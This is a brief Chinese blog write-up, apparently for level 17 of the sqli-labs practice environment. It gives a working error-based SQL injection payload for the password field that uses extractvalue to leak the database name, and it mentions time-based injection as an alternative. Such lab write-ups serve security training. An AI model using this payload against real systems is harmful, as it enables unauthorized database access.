sqli labs-17

1、username处被过滤了很多。但是当在password处输入带单引号时会报错。直接构造报错注入语句。1′ and extractvalue(1,concat(0x7e,(select database()),0x7e))#

也可以采用延时注入

发表评论

电子邮件地址不会被公开。 必填项已用*标注